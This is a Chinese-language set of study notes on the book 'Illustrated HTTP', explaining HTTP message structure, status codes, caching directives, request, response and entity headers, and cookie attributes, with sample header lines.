图解HTTP学习笔记

来源:互联网 发布:阿里云怎么绑定域名 编辑:程序博客网 时间:2024/06/07 23:20

HTTP 协议和 TCP/IP 协议族内的其他众多的协议相同, 用于客户端和服务器之间的通信。

简单的HTTP协议

HTTP报文格式

HTTP请求头
下面则是从客户端发送给某个 HTTP 服务器端的请求报文中的内容。

GET /index.html HTTP/1.1Host: www.baidu.com

请求报文是由请求方法、 请求 URI、 协议版本、 可选的请求首部字段和内容实体构成的。

HTTP响应头

HTTP/1.1 200 OKDate: Tue, 10 Jul 2012 06:50:15 GMTContent-Length: 362Content-Type: text/html<html>……

响应报文基本上由协议版本、 状态码( 表示请求成功或失败的数字代码) 、 用以解释状态码的原因短语、 可选的响应首部字段以及实体主体构成。

HTTP协议不保存状态

HTTP是一种不保存状态, 即无状态( stateless) 协议。 HTTP 协议自身不对请求和响应之间的通信状态进行保存。 也就是说在 HTTP 这个级别, 协议对于发送过的请求或响应都不做持久化处理。

HTTP一些方法

GET/POST/PUT/HEAD/DELETE/OPTIONS/TRACE/CONNECT 等。

持久连接节省通信量

持久连接的好处在于减少了 TCP 连接的重复建立和断开所造成的额外开销, 减轻了服务器端的负载。 另外, 减少开销的那部分时间, 使HTTP 请求和响应能够更早地结束, 这样 Web 页面的显示速度也就相应提高了。
在 HTTP/1.1 中, 所有的连接默认都是持久连接, 但在 HTTP/1.0 内并未标准化。 虽然有一部分服务器通过非标准的手段实现了持久连接,但服务器端不一定能够支持持久连接。 毫无疑问, 除了服务器端, 客户端也需要支持持久连接。
持久连接使得多数请求以管线化(pipelining)方式发送成为可能。 从前发送请求后需等待并收到响应, 才能发送下一个请求。 管线化技术出现后, 不用等待响应亦可直接发送下一个请求。这样就能够做到同时并行发送多个请求, 而不需要一个接一个地等待响应了。

Cookie会根据从服务器端发送的响应报文内的一个叫做 Set-Cookie 的首部字段信息, 通知客户端保存 Cookie。 当下次客户端再往该服务器发送请求时, 客户端会自动在请求报文中加入 Cookie 值后发送出去。
服务器端发现客户端发送过来的 Cookie 后, 会去检查究竟是从哪一个客户端发来的连接请求, 然后对比服务器上的记录, 最后得到之前的状态信息。

HTTP报文内的HTTP信息

用于HTTP协议交互的信息被称为HTTP报文。请求端(客户端)的HTTP报文叫做请求报文,响应端(服务器端)的叫做响应报文。HTTP报文本身是由多行(用 CR+LF 作换行符) 数据构成的字符串文本。
请求和响应报文

编码提升传输速率

HTTP在传输数据时可以按照数据原貌直接传输, 但也可以在传输过程中通过编码提升传输速率。 通过在传输时编码, 能有效地处理大量的访问请求。 但是, 编码的操作需要计算机来完成, 因此会消耗更多的 CPU 等资源。
报文(message)是HTTP通信中的基本单位,由 8 位组字节流(octet sequence,其中 octet 为 8 个比特)组成,通过HTTP通信传输。
实体(entity)作为请求或响应的有效载荷数据(补充项)被传输,其内容由实体首部和实体主体组成。

压缩传输的内容编码

内容编码指明应用在实体内容上的编码格式,并保持实体信息原样压缩。内容编码后的实体由客户端接收并负责解码。
常用的内容编码有以下几种。
- gzip( GNU zip)
- compress( UNIX 系统的标准压缩)
- deflate( zlib)
- identity( 不进行编码)

分割发送的分块传输编码

在HTTP通信过程中,请求的编码实体资源尚未全部传输完成之前,浏览器无法显示请求页面。在传输大容量数据时,通过把数据分割成多块,能够让浏览器逐步显示页面。这种把实体主体分块的功能称为分块传输编码( Chunked TransferCoding) 。
分块传输编码会将实体主体分成多个部分(块)。每一块都会用十六进制来标记块的大小,而实体主体的最后一块会使用“0(CR+LF)”来标记。
使用分块传输编码的实体主体会由接收的客户端负责解码,恢复到编码前的实体主体。

发送多种数据的多部分对象集合

HTTP协议中也采纳了多部分对象集合,发送的一份报文主体内可含有多类型实体。 通常是在图片或文本文件等上传时使用。
multipart/form-data
在HTTP报文中使用多部分对象集合时,需要在首部字段里加上Content-type。
使用boundary字符串来划分多部分对象集合指明的各类实体。在boundary 字符串指定的各个实体的起始行之前插入“–”标记。

返回结果的HTTP状态码

- 类别 原因短语 1XX Informational( 信息性状态码) 接收的请求正在处理 2XX Success( 成功状态码) 请求正常处理完毕 3XX Redirection( 重定向状态码) 需要进行附加操作以完成请求 4XX Client Error( 客户端错误状态码) 服务器无法处理请求 5XX Server Error( 服务器错误状态码) 服务器处理请求出错

200OK

表示从客户端发来的请求在服务器端被正常处理了。
在响应报文内,随状态码一起返回的信息会因方法的不同而发生改变。比如,使用 GET 方法时,对应请求资源的实体会作为响应返回;而使用 HEAD 方法时,对应请求资源的实体首部不随报文主体作为响应返回(即在响应中只返回首部,不会返回实体的主体部分)。

204 No Content

该状态码代表服务器接收的请求已成功处理,但在返回的响应报文中不含实体的主体部分。另外,也不允许返回任何实体的主体。比如,当从浏览器发出请求处理后,返回 204 响应,那么浏览器显示的页面不发生更新。
一般在只需要从客户端往服务器发送信息,而对客户端不需要发送新信息内容的情况下使用。

206 Partial Content

该状态码表示客户端进行了范围请求, 而服务器成功执行了这部分的GET 请求。 响应报文中包含由 Content-Range 指定范围的实体内容。

301 Moved Permanently

永久性重定向。该状态码表示请求的资源已被分配了新的 URI,以后应使用资源现在所指的 URI。也就是说,如果已经把资源对应的 URI保存为书签了,这时应该按 Location 首部字段提示的 URI 重新保存。

302 Found

临时性重定向。 该状态码表示请求的资源已被分配了新的 URI, 希望用户( 本次) 能使用新的 URI 访问。
和 301 Moved Permanently 状态码相似, 但 302 状态码代表的资源不是被永久移动, 只是临时性质的。 换句话说, 已移动的资源对应的URI 将来还有可能发生改变。 比如, 用户把 URI 保存成书签, 但不会像 301 状态码出现时那样去更新书签, 而是仍旧保留返回 302 状态码的页面对应的 URI。

303 See Other

该状态码表示由于请求对应的资源存在着另一个 URI, 应使用 GET方法定向获取请求的资源。303 状态码和 302 Found 状态码有着相同的功能, 但 303 状态码明确表示客户端应当采用 GET 方法获取资源, 这点与 302 状态码有区别。

304 Not Modified

该状态码表示客户端发送附带条件的请求 2 时, 服务器端允许请求访问资源, 但未满足条件的情况。 304 状态码返回时, 不包含任何响应的主体部分。 304 虽然被划分在 3XX 类别中, 但是和重定向没有关系。附带条件的请求是指采用GET方法的请求报文中包含 If-Match, If-ModifiedSince, If-None-Match, If-Range, If-Unmodified-Since 中任一首部。

307 Temporary Redirect

临时重定向。 该状态码与 302 Found 有着相同的含义。 尽管 302 标准禁止 POST 变换成 GET, 但实际使用时大家并不遵守。307 会遵照浏览器标准, 不会从 POST 变成 GET。 但是, 对于处理响应时的行为, 每种浏览器有可能出现不同的情况。

400 Bad Request

该状态码表示请求报文中存在语法错误。 当错误发生时, 需修改请求的内容后再次发送请求。 另外, 浏览器会像 200 OK 一样对待该状态码。

401 Unauthorized

该状态码表示发送的请求需要有通过 HTTP 认证( BASIC 认证、DIGEST 认证) 的认证信息。 另外若之前已进行过 1 次请求, 则表示用 户认证失败。
返回含有 401 的响应必须包含一个适用于被请求资源的 WWWAuthenticate 首部用以质询( challenge) 用户信息。 当浏览器初次接收到 401 响应, 会弹出认证用的对话窗口。

403 Forbidden

该状态码表明对请求资源的访问被服务器拒绝了。 服务器端没有必要给出拒绝的详细理由, 但如果想作说明的话, 可以在实体的主体部分对原因进行描述, 这样就能让用户看到了。未获得文件系统的访问授权, 访问权限出现某些问题( 从未授权的发送源 IP 地址试图访问) 等列举的情况都可能是发生 403 的原因。

404 Not Found

该状态码表明服务器上无法找到请求的资源。 除此之外, 也可以在服务器端拒绝请求且不想说明理由时使用。

500 Internal Server Error

该状态码表明服务器端在执行请求时发生了错误。 也有可能是 Web 应用存在的 bug 或某些临时的故障。

503 Service Unavailable

该状态码表明服务器暂时处于超负载或正在进行停机维护, 现在无法处理请求。 如果事先得知解除以上状况需要的时间, 最好写入RetryAfter 首部字段再返回给客户端。

HTTP首部

通用首部字段

Cache-Control

通过指定首部字段 Cache-Control 的指令, 就能操作缓存的工作机制。
public
Cache-Control: public
当指定使用 public 指令时, 则明确表明其他用户也可利用缓存。
private
Cache-Control: private
当指定 private 指令后, 响应只以特定的用户作为对象, 这与 public 指令的行为相反。缓存服务器会对该特定用户提供资源缓存的服务, 对于其他用户发送过来的请求, 代理服务器则不会返回缓存。
no-cache
Cache-Control: no-cache
使用 no-cache 指令的目的是为了防止从缓存中返回过期的资源。
客户端发送的请求中如果包含 no-cache 指令, 则表示客户端将不会接收缓存过的响应。 于是, “中间”的缓存服务器必须把客户端请求转发给源服务器。
如果服务器返回的响应中包含 no-cache 指令, 那么缓存服务器不能对资源进行缓存。 源服务器以后也将不再对缓存服务器请求中提出的资源有效性进行确认, 且禁止其对响应资源进行缓存操作。
no-store
Cache-Control: no-store
当使用 no-store 指令时, 暗示请求( 和对应的响应) 或响应中包含机密信息。从字面意思上很容易把 no-cache 误解成为不缓存, 但事实上 no-cache 代表不缓存过期的资源, 缓存会向源服务器进行有效期确认后处理资源, 也许称为 do-notserve-from-cache-without-revalidation 更合适。 no-store 才是真正地不进行缓存。
因此, 该指令规定缓存不能在本地存储请求或响应的任一部分。
s-maxage
Cache-Control: s-maxage=604800( 单位 : 秒)
s-maxage 指令的功能和 max-age 指令的相同, 它们的不同点是 smaxage 指令只适用于供多位用户使用的公共缓存服务器 (一般指代理)。 也就是说, 对于向同一用户重复返回响应的服务器来说, 这个指令没有任何作用。
max-age
Cache-Control: max-age=604800( 单位: 秒)
当客户端发送的请求中包含 max-age 指令时, 如果判定缓存资源的缓存时间数值比指定时间的数值更小, 那么客户端就接收缓存的资源。另外, 当指定 max-age 值为 0, 那么缓存服务器通常需要将请求转发给源服务器。
当服务器返回的响应中包含 max-age 指令时, 缓存服务器将不对资源的有效性再作确认, 而 max-age 数值代表资源保存为缓存的最长时间。
min-fresh
Cache-Control: min-fresh=60( 单位: 秒)
min-fresh 指令要求缓存服务器返回至少还未过指定时间的缓存资源。比如, 当指定 min-fresh 为 60 秒后, 过了 60 秒的资源都无法作为响应返回了。
max-stale
Cache-Control: max-stale=3600( 单位: 秒)
使用 max-stale 可指示缓存资源, 即使过期也照常接收。如果指令未指定参数值, 那么无论经过多久, 客户端都会接收响应;如果指令中指定了具体数值, 那么即使过期, 只要仍处于 max-stale指定的时间内, 仍旧会被客户端接收。
only-if-cached
Cache-Control: only-if-cached
使用 only-if-cached 指令表示客户端仅在缓存服务器本地缓存目标资源的情况下才会要求其返回。 换言之, 该指令要求缓存服务器不重新加载响应, 也不会再次确认资源有效性。 若发生请求缓存服务器的本地缓存无响应, 则返回状态码 504 Gateway Timeout。
must-revalidate
Cache-Control: must-revalidate
使用 must-revalidate 指令, 代理会向源服务器再次验证即将返回的响应缓存目前是否仍然有效。
若代理无法连通源服务器再次获取有效资源的话, 缓存必须给客户端一条 504( Gateway Timeout) 状态码。另外, 使用 must-revalidate 指令会忽略请求的 max-stale 指令( 即使已经在首部使用了 max-stale, 也不会再有效果) 。
proxy-revalidate
Cache-Control: proxy-revalidate
proxy-revalidate 指令要求所有的缓存服务器在接收到客户端带有该指令的请求返回响应之前, 必须再次验证缓存的有效性。
no-transform
Cache-Control: no-transform
使用 no-transform 指令规定无论是在请求还是响应中, 缓存都不能改变实体主体的媒体类型。这样做可防止缓存或代理压缩图片等类似操作。

Connection

Connection 首部字段具备如下两个作用。
控制不再转发给代理的首部字段:
Connection: 不再转发的首部字段名
在客户端发送请求和服务器返回响应内, 使用 Connection 首部字段, 可控制不再转发给代理的首部字段( 即 Hop-by-hop 首部) 。
管理持久连接:
Connection: close
HTTP/1.1 版本的默认连接都是持久连接 Connection: Keep-Alive。 为此, 客户端会在持久连接上连续发送请求。 当服务器端想明确断开连接时, 则指定Connection 首部字段的值为 Close。

Date

首部字段 Date 表明创建 HTTP 报文的日期和时间。
HTTP/1.1 协议使用在 RFC1123 中规定的日期时间的格式, 如下示例。

Date: Tue, 03 Jul 2012 04:40:59 GMT

Pragma

Pragma: no-cache
该首部字段属于通用首部字段, 但只用在客户端发送的请求中。 客户端会要求所有的中间服务器不返回缓存的资源。
所有的中间服务器如果都能以 HTTP/1.1 为基准, 那直接采用 CacheControl: no-cache 指定缓存的处理方式是最为理想的。 但要整体掌握全部中间服务器使用的 HTTP 协议版本却是不现实的。 因此, 发送的请求会同时含有下面两个首部字段。

Cache-Control: no-cachePragma: no-cache

Trailer

首部字段 Trailer 会事先说明在报文主体后记录了哪些首部字段。 该首部字段可应用在 HTTP/1.1 版本分块传输编码时。

HTTP/1.1 200 OKDate: Tue, 03 Jul 2012 04:40:56 GMTContent-Type: text/html...Transfer-Encoding: chunkedTrailer: Expires...(报文主体)...0Expires: Tue, 28 Sep 2004 23:59:59 GMT

以上用例中, 指定首部字段 Trailer 的值为 Expires, 在报文主体之后( 分块长度 0 之后) 出现了首部字段 Expires。

Transfer-Encoding

Transfer-Encoding: chunked
首部字段 Transfer-Encoding 规定了传输报文主体时采用的编码方式。HTTP/1.1 的传输编码方式仅对分块传输编码有效。

Upgrade

首部字段 Upgrade 用于检测 HTTP 协议及其他协议是否可使用更高的版本进行通信, 其参数值可以用来指定一个完全不同的通信协议。

Via

使用首部字段 Via 是为了追踪客户端与服务器之间的请求和响应报文的传输路径。
报文经过代理或网关时, 会先在首部字段 Via 中附加该服务器的信息, 然后再进行转发。 这个做法和 traceroute 及电子邮件的 Received首部的工作机制很类似。
首部字段 Via 不仅用于追踪报文的转发, 还可避免请求回环的发生。所以必须在经过代理时附加该首部字段内容。

Warning

HTTP/1.1 的 Warning 首部是从 HTTP/1.0 的响应首部( Retry-After) 演变过来的。 该首部通常会告知用户一些与缓存相关的问题的警告。

Warning: [警告码][警告的主机:端口号]“[警告内容]”([日期时间])

请求首部字段

请求首部字段是从客户端往服务器端发送请求报文中所使用的字段,用于补充请求的附加信息、 客户端信息、 对响应内容相关的优先级等内容。

Accept

Accept 首部字段可通知服务器, 用户代理能够处理的媒体类型及媒体类型的相对优先级。 可使用 type/subtype 这种形式, 一次指定多种媒体类型。

Accept: text/html,application/xhtml+xml,application/xml;q=0.3
  • 文本文件
    text/html, text/plain, text/css …
    application/xhtml+xml, application/xml …
  • 图片文件
    image/jpeg, image/gif, image/png …
  • 视频文件
    video/mpeg, video/quicktime …
  • 应用程序使用的二进制文件
    application/octet-stream, application/zip …
    若想要给显示的媒体类型增加优先级, 则使用 q= 来额外表示权重值, 用分号( ;) 进行分隔。 权重值 q 的范围是 0~1( 可精确到小数点后 3 位) , 且 1 为最大值。 不指定权重 q 值时, 默认权重为 q=1.0。

Accept-Charset

Accept-Charset 首部字段可用来通知服务器用户代理支持的字符集及字符集的相对优先顺序。 另外, 可一次性指定多种字符集。 与首部字段 Accept 相同的是可用权重 q 值来表示相对优先级。该首部字段应用于内容协商机制的服务器驱动协商。

Accept-Charset: iso-8859-5, unicode-1-1;q=0.8

Accept-Encoding

Accept-Encoding 首部字段用来告知服务器用户代理支持的内容编码及内容编码的优先级顺序。 可一次性指定多种内容编码。

Accept-Encoding: gzip, deflate
  • gzip
    由文件压缩程序 gzip( GNU zip) 生成的编码格式( RFC1952) , 采用 Lempel-Ziv 算法( LZ77) 及 32 位循环冗余校验( Cyclic Redundancy Check, 通称 CRC) 。
  • compress
    由 UNIX 文件压缩程序 compress 生成的编码格式, 采用 LempelZiv-Welch 算法( LZW) 。
  • deflate
    组合使用 zlib 格式( RFC1950) 及由 deflate 压缩算法( RFC1951) 生成的编码格式。
  • identity
    不执行压缩或不会变化的默认编码格式
    采用权重 q 值来表示相对优先级, 这点与首部字段 Accept 相同。 另外, 也可使用星号( *) 作为通配符, 指定任意的编码格式。

Accept-Language

Accept-Language: zh-cn,zh;q=0.7,en-us,en;q=0.3

首部字段 Accept-Language 用来告知服务器用户代理能够处理的自然语言集( 指中文或英文等) , 以及自然语言集的相对优先级。 可一次指定多种自然语言集。和 Accept 首部字段一样, 按权重值 q 来表示相对优先级。

Authorization

首部字段 Authorization 是用来告知服务器, 用户代理的认证信息( 证书值) 。 通常, 想要通过服务器认证的用户代理会在接收到返回的401 状态码响应后, 把首部字段 Authorization 加入请求中。 共用缓存在接收到含有 Authorization 首部字段的请求时的操作处理会略有差异。

Authorization: Basic dWVub3NlbjpwYXNzd29yZA==

Expect

Expect: 100-continue

客户端使用首部字段 Expect 来告知服务器, 期望出现的某种特定行为。 因服务器无法理解客户端的期望作出回应而发生错误时, 会返回状态码 417 Expectation Failed。
客户端可以利用该首部字段, 写明所期望的扩展。 虽然 HTTP/1.1 规范只定义了 100-continue( 状态码 100 Continue 之意) 。等待状态码 100 响应的客户端在发生请求时, 需要指定 Expect:100-continue。

From

首部字段 From 用来告知服务器使用用户代理的用户的电子邮件地址。 通常, 其使用目的就是为了显示搜索引擎等用户代理的负责人的电子邮件联系方式。 使用代理时, 应尽可能包含 From 首部字段( 但可能会因代理不同, 将电子邮件地址记录在 User-Agent 首部字段内) 。

Host

Host: www.hackr.jp

首部字段 Host 会告知服务器, 请求的资源所处的互联网主机名和端口号。 Host 首部字段在 HTTP/1.1 规范内是唯一一个必须被包含在请求内的首部字段。

If-Match

首部字段 If-Match, 属附带条件之一, 它会告知服务器匹配资源所用的实体标记( ETag) 值。 这时的服务器无法使用弱 ETag 值。服务器会比对 If-Match 的字段值和资源的 ETag 值, 仅当两者一致时, 才会执行请求。 反之, 则返回状态码 412 Precondition Failed 的响应。还可以使用星号( *) 指定 If-Match 的字段值。 针对这种情况, 服务器将会忽略 ETag 的值, 只要资源存在就处理请求。

If-Modified-Since

首部字段 If-Modified-Since, 属附带条件之一, 它会告知服务器若 IfModified-Since 字段值早于资源的更新时间, 则希望能处理该请求。而在指定 If-Modified-Since 字段值的日期时间之后, 如果请求的资源都没有过更新, 则返回状态码 304 Not Modified 的响应。If-Modified-Since 用于确认代理或客户端拥有的本地资源的有效性。获取资源的更新日期时间, 可通过确认首部字段 Last-Modified 来确定。

If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT

If-None-Match

只有在 If-None-Match 的字段值与 ETag 值不一致时, 可处理该请求。 与 If-Match 首部字段的作用相反首部字段 If-None-Match 属于附带条件之一。 它和首部字段 If-Match作用相反。 用于指定 If-None-Match 字段值的实体标记( ETag) 值与
请求资源的 ETag 不一致时, 它就告知服务器处理该请求。在 GET 或 HEAD 方法中使用首部字段 If-None-Match 可获取最新的资源。 因此, 这与使用首部字段 If-Modified-Since 时有些类似。

If-Range

首部字段 If-Range 属于附带条件之一。 它告知服务器若指定的 IfRange 字段值( ETag 值或者时间) 和请求资源的 ETag 值或时间相一致时, 则作为范围请求处理。 反之, 则返回全体资源。
不使用首部字段 If-Range 发送请求,服务器端的资源如果更新, 那客户端持有资源中的一部分也会随之无效, 当然, 范围请求作为前提是无效的。 这时, 服务器会暂且以状态码 412 Precondition Failed 作为响应返回, 其目的是催促客户端再次发送请求。 这样一来, 与使用首部字段 If-Range 比起来, 就需要花费两倍的功夫。

If-Unmodified-Since

首部字段 If-Unmodified-Since 和首部字段 If-Modified-Since 的作用相反。 它的作用的是告知服务器, 指定的请求资源只有在字段值内指定的日期时间之后, 未发生更新的情况下, 才能处理请求。 如果在指定日期时间后发生了更新, 则以状态码 412 Precondition Failed 作为响应返回。

If-Unmodified-Since: Thu, 03 Jul 2012 00:00:00 GMT

Max-Forwards

Max-Forwards: 10

通过 TRACE 方法或 OPTIONS 方法, 发送包含首部字段 MaxForwards 的请求时, 该字段以十进制整数形式指定可经过的服务器最大数目。 服务器在往下一个服务器转发请求之前, Max-Forwards 的值减 1 后重新赋值。 当服务器接收到 Max-Forwards 值为 0 的请求时, 则不再进行转发, 而是直接返回响应。
使用 HTTP 协议通信时, 请求可能会经过代理等多台服务器。 途中,如果代理服务器由于某些原因导致请求转发失败, 客户端也就等不到服务器返回的响应了。 对此, 我们无从可知。
可以灵活使用首部字段 Max-Forwards, 针对以上问题产生的原因展开调查。 由于当 Max-Forwards 字段值为 0 时, 服务器就会立即返回响应, 由此我们至少可以对以那台服务器为终点的传输路径的通信状况有所把握。

Proxy-Authorization

接收到从代理服务器发来的认证质询时, 客户端会发送包含首部字段 Proxy-Authorization 的请求, 以告知服务器认证所需要的信息。这个行为是与客户端和服务器之间的 HTTP 访问认证相类似的, 不同之处在于, 认证行为发生在客户端与代理之间。 客户端与服务器之间的认证, 使用首部字段 Authorization 可起到相同作用。 有关 HTTP 访问认证, 后面的章节会作详尽阐述。

Proxy-Authorization: Basic dGlwOjkpNLAGfFY5

Range

对于只需获取部分资源的范围请求, 包含首部字段 Range 即可告知服务器资源的指定范围。 上面的示例表示请求获取从第 5001 字节至第10000 字节的资源。接收到附带 Range 首部字段请求的服务器, 会在处理请求之后返回状态码为 206 Partial Content 的响应。 无法处理该范围请求时, 则会返回状态码 200 OK 的响应及全部资源。

Range: bytes=5001-10000

Referer

首部字段 Referer 会告知服务器请求的原始资源的 URI。客户端一般都会发送 Referer 首部字段给服务器。 但当直接在浏览器
的地址栏输入 URI, 或出于安全性的考虑时, 也可以不发送该首部字段。
因为原始资源的 URI 中的查询字符串可能含有 ID 和密码等保密信息, 要是写进 Referer 转发给其他服务器, 则有可能导致保密信息的泄露。
另外, Referer 的正确的拼写应该是 Referrer, 但不知为何, 大家一直沿用这个错误的拼写。

TE

TE: gzip, deflate;q=0.5

首部字段 TE 会告知服务器客户端能够处理响应的传输编码方式及相对优先级。 它和首部字段 Accept-Encoding 的功能很相像, 但是用于传输编码。
首部字段 TE 除指定传输编码之外, 还可以指定伴随 trailer 字段的分块传输编码的方式。 应用后者时, 只需把 trailers 赋值给该字段值。

TE: trailers

User-Agent

首部字段 User-Agent 会将创建请求的浏览器和用户代理名称等信息传达给服务器。
由网络爬虫发起请求时, 有可能会在字段内添加爬虫作者的电子邮件地址。 此外, 如果请求经过代理, 那么中间也很可能被添加上代理服务器的名称。

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1

响应首部字段

响应首部字段是由服务器端向客户端返回响应报文中所使用的字段,用于补充响应的附加信息、 服务器信息, 以及对客户端的附加要求等信息。

Accept-Ranges

Accept-Ranges: bytes

首部字段 Accept-Ranges 是用来告知客户端服务器是否能处理范围请求, 以指定获取服务器端某个部分的资源。
可指定的字段值有两种, 可处理范围请求时指定其为 bytes, 反之则指定其为 none。

Age

首部字段 Age 能告知客户端, 源服务器在多久前创建了响应。 字段值的单位为秒。
若创建该响应的服务器是缓存服务器, Age 值是指缓存后的响应再次发起认证到认证完成的时间值。 代理创建响应时必须加上首部字段Age。

ETag

首部字段 ETag 能告知客户端实体标识。 它是一种可将资源以字符串形式做唯一性标识的方式。 服务器会为每份资源分配对应的 ETag值。
另外, 当资源更新时, ETag 值也需要更新。 生成 ETag 值时, 并没有统一的算法规则, 而仅仅是由服务器来分配。
资源被缓存时, 就会被分配唯一性标识。 例如, 当使用中文版的浏览器访问 http://www.google.com/ 时, 就会返回中文版对应的资源, 而使用英文版的浏览器访问时, 则会返回英文版对应的资源。 两者的URI 是相同的, 所以仅凭 URI 指定缓存的资源是相当困难的。 若在下载过程中出现连接中断、 再连接的情况, 都会依照 ETag 值来指定资源。
强 ETag 值, 不论实体发生多么细微的变化都会改变其值。

ETag: "usagi-1234"

弱 ETag 值只用于提示资源是否相同。 只有资源发生了根本改变, 产生差异时才会改变 ETag 值。 这时, 会在字段值最开始处附加 W/。

ETag: W/"usagi-1234"

Location

使用首部字段 Location 可以将响应接收方引导至某个与请求 URI 位置不同的资源。
基本上, 该字段会配合 3xx : Redirection 的响应, 提供重定向的URI。几乎所有的浏览器在接收到包含首部字段 Location 的响应后, 都会强制性地尝试对已提示的重定向资源的访问。

Proxy-Authenticate

首部字段 Proxy-Authenticate 会把由代理服务器所要求的认证信息发送给客户端。
它与客户端和服务器之间的 HTTP 访问认证的行为相似, 不同之处在于其认证行为是在客户端与代理之间进行的。 而客户端与服务器之间进行认证时, 首部字段 WWW-Authorization 有着相同的作用。

Retry-After

首部字段 Retry-After 告知客户端应该在多久之后再次发送请求。 主要配合状态码 503 Service Unavailable 响应, 或 3xx Redirect 响应一起使用。
字段值可以指定为具体的日期时间( Wed, 04 Jul 2012 06: 34: 24 GMT 等格式) , 也可以是创建响应后的秒数。

Server

首部字段 Server 告知客户端当前服务器上安装的 HTTP 服务器应用程序的信息。 不单单会标出服务器上的软件应用名称, 还有可能包括版本号和安装时启用的可选项。

Vary

当代理服务器接收到带有 Vary 首部字段指定获取资源的请求时, 如果使用的 Accept-Language 字段的值相同, 那么就直接从缓存返回响应。 反之, 则需要先从源服务器端获取资源后才能作为响应返回

Vary: Accept-Language

首部字段 Vary 可对缓存进行控制。 源服务器会向代理服务器传达关于本地缓存使用方法的命令。从代理服务器接收到源服务器返回包含 Vary 指定项的响应之后, 若再要进行缓存, 仅对请求中含有相同 Vary 指定首部字段的请求返回缓存。 即使对相同资源发起请求, 但由于 Vary 指定的首部字段不相同, 因此必须要从源服务器重新获取资源。

WWW-Authenticate

WWW-Authenticate: Basic realm="Usagidesign Auth"

首部字段 WWW-Authenticate 用于 HTTP 访问认证。 它会告知客户端适用于访问请求 URI 所指定资源的认证方案( Basic 或是 Digest) 和带参数提示的质询( challenge) 。 状态码 401 Unauthorized 响应中,肯定带有首部字段 WWW-Authenticate。realm 字段的字符串是为了辨别请求 URI 指定资源所受到的保护策略。

实体首部字段

实体首部字段是包含在请求报文和响应报文中的实体部分所使用的首部, 用于补充内容的更新时间等与实体相关的信息。

Allow

首部字段 Allow 用于通知客户端能够支持 Request-URI 指定资源的所有 HTTP 方法。 当服务器接收到不支持的 HTTP 方法时, 会以状态码 405 Method Not Allowed 作为响应返回。 与此同时, 还会把所有能支持的 HTTP 方法写入首部字段 Allow 后返回。

Allow: GET, HEAD

Content-Encoding

Content-Encoding: gzip

首部字段 Content-Encoding 会告知客户端服务器对实体的主体部分选用的内容编码方式。 内容编码是指在不丢失实体信息的前提下所进行的压缩。

Content-Language

首部字段 Content-Language 会告知客户端, 实体主体使用的自然语言( 指中文或英文等语言) 。

Content-Language: zh-CN

Content-Length

Content-Length: 15000

首部字段 Content-Length 表明了实体主体部分的大小( 单位是字节) 。 对实体主体进行内容编码传输时, 不能再使用 Content-Length首部字段。

Content-Location

首部字段 Content-Location 给出与报文主体部分相对应的 URI。 和首部字段 Location 不同, Content-Location 表示的是报文主体返回资源对应的 URI。

Content-MD5

首部字段 Content-MD5 是一串由 MD5 算法生成的值, 其目的在于检查报文主体在传输过程中是否保持完整, 以及确认传输到达。对报文主体执行 MD5 算法获得的 128 位二进制数, 再通过 Base64 编码后将结果写入 Content-MD5 字段值。 由于 HTTP 首部无法记录二进制值, 所以要通过 Base64 编码处理。 为确保报文的有效性, 作为接收方的客户端会对报文主体再执行一次相同的 MD5 算法。 计算出的值与字段值作比较后, 即可判断出报文主体的准确性。
采用这种方法, 对内容上的偶发性改变是无从查证的, 也无法检测出恶意篡改。 其中一个原因在于, 内容如果能够被篡改, 那么同时意味着 Content-MD5 也可重新计算然后被篡改。 所以处在接收阶段的客户端是无法意识到报文主体以及首部字段 Content-MD5 是已经被篡改过的。

Content-Range

针对范围请求, 返回响应时使用的首部字段 Content-Range, 能告知客户端作为响应返回的实体的哪个部分符合范围请求。 字段值以字节为单位, 表示当前发送部分及整个实体大小。

Content-Range: bytes 5001-10000/10000

Content-Type

Content-Type: text/html; charset=UTF-8

首部字段 Content-Type 说明了实体主体内对象的媒体类型。 和首部字段 Accept 一样, 字段值用 type/subtype 形式赋值。

Expires

Expires: Wed, 04 Jul 2012 08:26:05 GMT

首部字段 Expires 会将资源失效的日期告知客户端。 缓存服务器在接收到含有首部字段 Expires 的响应后, 会以缓存来应答请求, 在Expires 字段值指定的时间之前, 响应的副本会一直被保存。 当超过指定的时间后, 缓存服务器在请求发送过来时, 会转向源服务器请求资源。
源服务器不希望缓存服务器对资源缓存时, 最好在 Expires 字段内写入与首部字段 Date 相同的时间值。但是, 当首部字段 Cache-Control 有指定 max-age 指令时, 比起首部字段 Expires, 会优先处理 max-age 指令。

Last-Modified

Last-Modified: Wed, 23 May 2012 09:59:55 GMT

首部字段 Last-Modified 指明资源最终修改的时间。 一般来说, 这个值就是 Request-URI 指定资源被修改的时间。 但类似使用 CGI 脚本进行动态数据处理时, 该值有可能会变成数据最终修改时的时间。

Set-Cookie: status=enable; expires=Tue, 05 Jul 2011 07:26:31 GMT; path=/; domain=.hackr.jp;

当服务器准备开始管理客户端的状态时, 会事先告知各种信息。

属性 说明 NAME=VALUE 赋予 Cookie 的名称和其值( 必需项) expires=DATE Cookie 的有效期( 若不明确指定则默认为浏览器关闭前为止) path=PATH 将服务器上的文件目录作为Cookie的适用对象( 若不指定则默认为文档所在的文件目录) domain=域名 作为 Cookie 适用对象的域名 ( 若不指定则默认为创建 Cookie的服务器的域名) Secure 仅在 HTTPS 安全通信时才会发送 Cookie HttpOnly 加以限制, 使 Cookie 不能被 JavaScript 脚本访问

expires 属性
Cookie 的 expires 属性指定浏览器可发送 Cookie 的有效期。当省略 expires 属性时, 其有效期仅限于维持浏览器会话( Session)时间段内。 这通常限于浏览器应用程序被关闭之前。
另外, 一旦 Cookie 从服务器端发送至客户端, 服务器端就不存在可以显式删除 Cookie 的方法。 但可通过覆盖已过期的 Cookie, 实现对客户端 Cookie 的实质性删除操作。
path 属性
Cookie 的 path 属性可用于限制指定 Cookie 的发送范围的文件目录。不过另有办法可避开这项限制, 看来对其作为安全机制的效果不能抱有期待。
domain 属性
通过 Cookie 的 domain 属性指定的域名可做到与结尾匹配一致。 比如, 当指定 example.com 后, 除 example.com 以外, www.example.com或 www2.example.com 等都可以发送 Cookie。因此, 除了针对具体指定的多个域名发送 Cookie 之 外, 不指定domain 属性显得更安全。
secure 属性
Cookie 的 secure 属性用于限制 Web 页面仅在 HTTPS 安全连接时, 才可以发送 Cookie。
发送 Cookie 时, 指定 secure 属性的方法如下所示。

Set-Cookie: name=value; secure

